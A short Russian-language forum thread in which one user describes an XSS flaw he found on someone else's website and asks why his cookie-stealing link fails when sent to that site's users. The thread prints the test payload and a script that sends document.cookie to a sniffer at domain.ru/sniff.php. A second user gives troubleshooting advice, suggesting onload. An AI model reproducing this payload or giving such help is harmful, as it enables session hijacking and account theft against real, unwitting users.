Нужна помощь по XSS

[skynett]

Здравствуйте уважаемые форумчане нужна ваша помощь ) Была обнаружена XSS уязвимость на одном из сайтов при вводе

<script>alert(document.cookie)</script>

сайт показывает мне мои куки и с этого я сделал вывод что сайт уязвим. На одном форуме дали код сниффера он отлично работает проверил на одном из своих сайтов.Но дело в том что когда я даю пользователю данного сайта уязвимою ссылку типа

<script>img = new Image();img.src="http://domain.ru/sniff.php?cookie="+document.cookie;</script>

и он по ней проходит куки не отправляются что можно сделать ?

 

[glOOk137]

У тебя изображение отображается из пути http://domain.ru/sniff.php?cookie="+document.cookie
А должен код выполниться при загрузке изображения.
Пробуй через onload